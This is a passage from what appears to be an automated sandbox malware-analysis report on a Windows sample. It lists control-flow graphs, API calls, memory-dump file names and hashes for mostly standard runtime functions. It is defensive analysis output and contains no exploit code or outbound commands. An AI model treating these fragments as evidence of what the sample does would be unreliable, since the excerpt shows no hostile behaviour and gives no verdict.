                          • ___TypeMatch.LIBVCRUNTIME ref: 0095BF6F
                          • _UnwindNestedFrames.LIBCMT ref: 0095C0C1
                          • CallUnexpected.LIBVCRUNTIME ref: 0095C0DC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2751267872-393685449
                          • Opcode ID: 0c12d7955eb59e83b5db25d8df3fd22f810242587654208ab4ad1e69e933a65f
                          • Instruction ID: b391f12ad02f38fbfd34fb650dd8e0c645c5cd0865eeb365d9650c7d079b5fef
                          • Opcode Fuzzy Hash: 0c12d7955eb59e83b5db25d8df3fd22f810242587654208ab4ad1e69e933a65f
                          • Instruction Fuzzy Hash: C3B187B1800209EFCF18EFA6C881AAEB7B9BF44316F14455AED056B252D331DA59CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 257 966dcc-966ddc 258 966df6-966df8 257->258 259 966dde-966df1 call 95fc44 call 95fc57 257->259 261 966dfe-966e04 258->261 262 96714c-967159 call 95fc44 call 95fc57 258->262 275 967164 259->275 261->262 265 966e0a-966e36 261->265 281 96715f call 95cfdf 262->281 265->262 268 966e3c-966e45 265->268 271 966e47-966e5a call 95fc44 call 95fc57 268->271 272 966e5f-966e61 268->272 271->281 273 966e67-966e6b 272->273 274 967148-96714a 272->274 273->274 280 966e71-966e75 273->280 279 967167-96716a 274->279 275->279 280->271 283 966e77-966e8e 280->283 281->275 286 966ed3-966ed9 283->286 287 966e90-966e93 283->287 288 966eaa-966ec1 call 95fc44 call 95fc57 call 95cfdf 286->288 289 966edb-966ee2 286->289 290 966e95-966e9d 287->290 291 966ea2-966ea8 287->291 322 96707f 288->322 292 966ee6-966f04 call 963e93 call 96314b * 2 289->292 293 966ee4 289->293 294 966f53-966f66 290->294 291->288 295 966ec6-966ed1 291->295 331 966f06-966f1c call 95fc57 call 95fc44 292->331 332 966f21-966f49 call 967372 292->332 293->292 299 967022-96702b call 96c40f 294->299 300 966f6c-966f78 294->300 297 966f50 295->297 297->294 310 96709c 299->310 311 96702d-96703f 299->311 300->299 304 966f7e-966f80 300->304 304->299 308 966f86-966fa7 304->308 308->299 313 966fa9-966fbf 308->313 315 9670a0-9670b6 ReadFile 310->315 311->310 317 967041-967050 GetConsoleMode 311->317 313->299 319 966fc1-966fc3 313->319 320 967114-96711f GetLastError 315->320 321 9670b8-9670be 315->321 317->310 323 967052-967056 317->323 319->299 325 966fc5-966fe8 319->325 326 967121-967133 call 95fc57 call 95fc44 320->326 327 967138-96713b 320->327 321->320 328 9670c0 321->328 330 967082-96708c call 96314b 322->330 323->315 329 967058-967070 ReadConsoleW 323->329 325->299 333 966fea-967000 325->333 326->322 339 967141-967143 327->339 340 967078-96707e call 95fbfd 327->340 336 9670c3-9670d5 328->336 337 967072 GetLastError 329->337 338 967091-96709a 329->338 330->279 331->322 332->297 333->299 343 967002-967004 333->343 336->330 346 9670d7-9670db 336->346 337->340 338->336 339->330 340->322 343->299 350 967006-96701d 343->350 352 9670f4-967101 346->352 353 9670dd-9670ed call 966ae6 346->353 350->299 359 967103 call 966c3d 352->359 360 96710d-967112 call 96693e 352->360 364 9670f0-9670f2 353->364 365 967108-96710b 359->365 360->365 364->330 365->364
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3907804496
                          • Opcode ID: 1c50a5e13c7814ae02a4cbfbbf593fecb1040101494f33ec97a3ce8aa388f300
                          • Instruction ID: daf94a0241e1bcfa0d3fcc5d33231daeb100af0aedc967d002c7c2579b5f9cfa
                          • Opcode Fuzzy Hash: 1c50a5e13c7814ae02a4cbfbbf593fecb1040101494f33ec97a3ce8aa388f300
                          • Instruction Fuzzy Hash: 10B13670A0C249AFDB11CFD9C880BBEBBB5BF86318F148169E8549B392D7759D41CB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 367 96dcc9-96dcfb 368 96dd0d-96dd10 367->368 369 96dcfd-96dd0b call 95fd36 367->369 371 96dd16-96dd1b 368->371 372 96df11 368->372 369->371 373 96dd2d-96dd30 371->373 374 96dd1d-96dd2b call 95fd36 371->374 375 96df13-96df24 call 958791 372->375 373->372 378 96dd36-96dd3b 373->378 374->378 381 96dd3d-96dd45 378->381 382 96dd48-96dd4a 378->382 381->382 384 96dd54-96dd56 382->384 385 96dd4c-96dd4e 382->385 387 96df61 384->387 388 96dd5c-96dd5f 384->388 385->384 386 96ddf3-96de0b call 967fb9 385->386 386->372 395 96de11-96de1d 386->395 389 96dd65-96dd68 388->389 390 96ddeb-96ddee 388->390 393 96ddb0-96ddb3 389->393 394 96dd6a-96dd77 GetCPInfo 389->394 390->375 393->375 394->372 396 96dd7d-96dd7f 394->396 397 96de23-96de28 395->397 398 96df5d-96df5f 395->398 399 96dd81-96dd85 396->399 400 96ddb8-96ddba 396->400 401 96de41 397->401 402 96de2a-96de33 call 958ae0 397->402 404 96df56-96df5b call 958250 398->404 399->393 405 96dd87-96dd8e 399->405 400->386 403 96ddbc-96ddc0 400->403 409 96de42 call 963e93 401->409 402->398 417 96de39-96de3f 402->417 403->390 408 96ddc2-96ddc9 403->408 418 96df10 404->418 405->393 410 96dd90 405->410 408->390 414 96ddcb 408->414 415 96de47-96de4c 409->415 411 96dd93-96dd98 410->411 411->393 416 96dd9a-96dd9e 411->416 419 96ddce-96ddd3 414->419 415->398 420 96de52 415->420 421 96dda0-96dda2 416->421 422 96dda8-96ddae 416->422 423 96de58-96de5d 417->423 418->372 419->390 424 96ddd5-96ddd9 419->424 420->423 421->387 421->422 422->393 422->411 423->398 427 96de63-96de7b call 967fb9 423->427 425 96dde3-96dde9 424->425 426 96dddb-96dddd 424->426 425->390 425->419 426->387 426->425 430 96df55 427->430 431 96de81-96de9a call 967fb9 427->431 430->404 431->430 434 96dea0-96deac 431->434 435 96deb2-96deb7 434->435 436 96df51-96df53 434->436 438 96ded0 435->438 439 96deb9-96dec2 call 958ae0 435->439 437 96df04-96df0f call 958250 * 2 436->437 437->418 442 96ded1 call 963e93 438->442 439->436 447 96dec8-96dece 439->447 445 96ded6-96dedb 442->445 445->436 448 96dedd 445->448 450 96dee3-96dee8 447->450 448->450 450->436 451 96deea-96df01 call 967fb9 450->451 454 96df25-96df4f call 963a5b call 958250 * 2 451->454 455 96df03 451->455 454->375 455->437
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: __freea$__alloca_probe_16$Info
                          • String ID:
                          • API String ID: 127012223-0
                          • Opcode ID: 6e4c0a7bff560108155b0899bd726ab8adac3711f6f76836d474e6461b8fadd8
                          • Instruction ID: 92c9fbdd6edf2c17b9c02f939fd1c4389dc364b0a80c032319dd13959bebda41
                          • Opcode Fuzzy Hash: 6e4c0a7bff560108155b0899bd726ab8adac3711f6f76836d474e6461b8fadd8
                          • Instruction Fuzzy Hash: 4371E472F062059BDF21AE948C51BAF7BB99F95310F290415E929BB2C1DA35DC04C7A0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 462 958084-95809c 463 9580b2-9580da MultiByteToWideChar 462->463 464 95809e-9580ae call 95fd36 462->464 465 9580e0-9580ec 463->465 466 95823e-95824f call 958791 463->466 464->463 473 9580b0 464->473 470 9580f2-9580f7 465->470 471 95822e 465->471 474 95810c 470->474 475 9580f9-958102 call 958ae0 470->475 476 958232 471->476 473->463 478 95810d call 95dc6e 474->478 483 958104-95810a 475->483 484 958122-958127 475->484 479 958234-95823c call 95806b 476->479 481 958112-958117 478->481 479->466 481->484 485 958119 481->485 487 95811f 483->487 484->476 488 95812d-958140 MultiByteToWideChar 484->488 485->487 487->484 488->476 489 958146-95815f LCMapStringEx 488->489 489->476 490 958165-95816d 489->490 491 95819f-9581ab 490->491 492 95816f-958174 490->492 494 958220 491->494 495 9581ad-9581af 491->495 492->479 493 95817a-95817c 492->493 493->479 496 958182-95819a LCMapStringEx 493->496 497 958224-95822c call 95806b 494->497 498 9581c4 495->498 499 9581b1-9581ba call 958ae0 495->499 496->479 497->479 502 9581c5 call 95dc6e 498->502 506 9581bc-9581c2 499->506 507 9581da-9581df 499->507 505 9581ca-9581cf 502->505 505->507 508 9581d1 505->508 510 9581d7 506->510 507->497 509 9581e1-9581fb LCMapStringEx 507->509 508->510 509->497 511 9581fd-958204 509->511 510->507 512 958206-958208 511->512 513 95820a-95820d 511->513 514 958210-95821e WideCharToMultiByte 512->514 513->514 514->497
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 009580CD
                          • __alloca_probe_16.LIBCMT ref: 009580F9
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00958138
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00958155
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00958194
                          • __alloca_probe_16.LIBCMT ref: 009581B1
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009581F3
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00958216
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                          • String ID:
                          • API String ID: 2040435927-0
                          • Opcode ID: b20344576abb64205e180e8dd122c927b940501f3078644f155b81330ea825f4
                          • Instruction ID: 9cee45eb785dbe133c91d921778292639495c82cc2f7a366fb15eec0cb464c97
                          • Opcode Fuzzy Hash: b20344576abb64205e180e8dd122c927b940501f3078644f155b81330ea825f4
                          • Instruction Fuzzy Hash: E551AB7260060AABEF20DF62DC45FAB7BA9FB84792F144425FD15E6190DF348C19DB60

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 515 95b810-95b861 call 96f2ea call 95b7d0 call 95c82c 522 95b863-95b875 515->522 523 95b8bd-95b8c0 515->523 524 95b8e0-95b8e9 522->524 526 95b877-95b88e 522->526 523->524 525 95b8c2-95b8cf call 95ca20 523->525 532 95b8d4-95b8dd call 95b7d0 525->532 527 95b8a4 526->527 528 95b890-95b89e call 95c9c0 526->528 531 95b8a7-95b8ac 527->531 536 95b8b4-95b8bb 528->536 537 95b8a0 528->537 531->526 534 95b8ae-95b8b0 531->534 532->524 534->524 538 95b8b2 534->538 536->532 540 95b8a2 537->540 541 95b8ea-95b8f3 537->541 538->532 540->531 542 95b8f5-95b8fc 541->542 543 95b92d-95b93d call 95ca00 541->543 542->543 544 95b8fe-95b90d call 96ef60 542->544 549 95b951-95b96d call 95b7d0 call 95c9e0 543->549 550 95b93f-95b94e call 95ca20 543->550 553 95b90f-95b927 544->553 554 95b92a 544->554 550->549 553->554 554->543
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 0095B847
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0095B84F
                          • _ValidateLocalCookies.LIBCMT ref: 0095B8D8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0095B903
                          • _ValidateLocalCookies.LIBCMT ref: 0095B958
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 4926af78beddf9b2ff33d5aeab4a107964eea3ee5fb1d373623a69468826816a
                          • Instruction ID: 1c88de7cb34bbf41b30612f621190cac15f53f5d7bc3986217adc9727401ebb1
                          • Opcode Fuzzy Hash: 4926af78beddf9b2ff33d5aeab4a107964eea3ee5fb1d373623a69468826816a
                          • Instruction Fuzzy Hash: A541B574E002189FCF10DF6AC895AAEBBB9EF84325F148155ED199B352D731D909CF90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 561 9638ae-9638ba 562 96394c-96394f 561->562 563 963955 562->563 564 9638bf-9638d0 562->564 565 963957-96395b 563->565 566 9638d2-9638d5 564->566 567 9638dd-9638f6 LoadLibraryExW 564->567 568 963975-963977 566->568 569 9638db 566->569 570 96395c-96396c 567->570 571 9638f8-963901 GetLastError 567->571 568->565 573 963949 569->573 570->568 572 96396e-96396f FreeLibrary 570->572 574 963903-963915 call 962ae8 571->574 575 96393a-963947 571->575 572->568 573->562 574->575 578 963917-963929 call 962ae8 574->578 575->573 578->575 581 96392b-963938 LoadLibraryExW 578->581 581->570 581->575
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,009639BB,00000000,00960F07,00000000,00000000,?,?,00963BE5,00000021,FlsSetValue,009737C8,009737D0,00000000), ref: 0096396F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 0c57cc6c80b1351c1a49f0de8fc3234645a59cdbfdfe583849e9b397d6fa65f6
                          • Instruction ID: 3abf425c1faa681dbcb9d101dd8638b7b0ef9a61d542aecc6a717b126669a2ca
                          • Opcode Fuzzy Hash: 0c57cc6c80b1351c1a49f0de8fc3234645a59cdbfdfe583849e9b397d6fa65f6
                          • Instruction Fuzzy Hash: 0921D872A05215FBDB219B60DC41B6A376CAB517B0B248110E91AA7290EB70EF00DEE0

                          Control-flow Graph

                          APIs
                          • __EH_prolog3.LIBCMT ref: 00956CE8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 00956CF2
                          • int.LIBCPMT ref: 00956D09
                            • Part of subcall function 00952D8F: std::_Lockit::_Lockit.LIBCPMT ref: 00952DA0
                            • Part of subcall function 00952D8F: std::_Lockit::~_Lockit.LIBCPMT ref: 00952DBA
                          • codecvt.LIBCPMT ref: 00956D2C
                          • std::_Facet_Register.LIBCPMT ref: 00956D43
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00956D63
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                          • String ID:
                          • API String ID: 712880209-0
                          • Opcode ID: 77f94ca8ce5f3ab96d1a6104bd9c8df063bb6e0452bd5ebb4ab554c7523d4cbb
                          • Instruction ID: c17ceeb1990cabe6dd1ee2392de6d240739c43094d7ff3a44c5577cffddfcf84
                          • Opcode Fuzzy Hash: 77f94ca8ce5f3ab96d1a6104bd9c8df063bb6e0452bd5ebb4ab554c7523d4cbb
                          • Instruction Fuzzy Hash: BC11AF71A002149FCB11EB66D8017AEBBF5AFC4312FA04519F805A7291DB70AE09CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 774 95b9d4-95b9db 775 95b9e0-95b9fb GetLastError call 95cb98 774->775 776 95b9dd-95b9df 774->776 779 95ba14-95ba16 775->779 780 95b9fd-95b9ff 775->780 781 95ba5a-95ba65 SetLastError 779->781 780->781 782 95ba01-95ba12 call 95cbd3 780->782 782->779 785 95ba18-95ba28 call 95df99 782->785 788 95ba3c-95ba4c call 95cbd3 785->788 789 95ba2a-95ba3a call 95cbd3 785->789 795 95ba52-95ba59 call 95d040 788->795 789->788 794 95ba4e-95ba50 789->794 794->795 795->781
                          APIs
                          • GetLastError.KERNEL32(?,?,0095B9CB,00959F90,00955EE2,48294190,?,?,?,?,0096F5A3,000000FF), ref: 0095B9E2
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095B9F0
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0095BA09
                          • SetLastError.KERNEL32(00000000,?,0095B9CB,00959F90,00955EE2,48294190,?,?,?,?,0096F5A3,000000FF), ref: 0095BA5B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: e7cca15071341a3c4039d6d0c58a570a91a2a64b43604d5d7c47edaf200b05e5
                          • Instruction ID: 6c30a714d4c2ae3925d1200d62a47a6abaac638d09b10afdcd9a4ac85cf73ad1
                          • Opcode Fuzzy Hash: e7cca15071341a3c4039d6d0c58a570a91a2a64b43604d5d7c47edaf200b05e5
                          • Instruction Fuzzy Hash: 32015E7621D3119EEA64A776AC96A7B27D8EB51777B20023AFD24950E2EF214809E340

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 826 9605cc-960609 GetModuleHandleExW 827 96062c-960630 826->827 828 96060b-96061d GetProcAddress 826->828 829 960632-960635 FreeLibrary 827->829 830 96063b-960648 827->830 828->827 831 96061f-96062a 828->831 829->830 831->827
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48294190,00000000,?,00000000,0096F7CA,000000FF,?,0096055C,?,?,00960530,?), ref: 00960601
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00960613
                          • FreeLibrary.KERNEL32(00000000,?,00000000,0096F7CA,000000FF,?,0096055C,?,?,00960530,?), ref: 00960635
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                          • Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd
                          Similarity
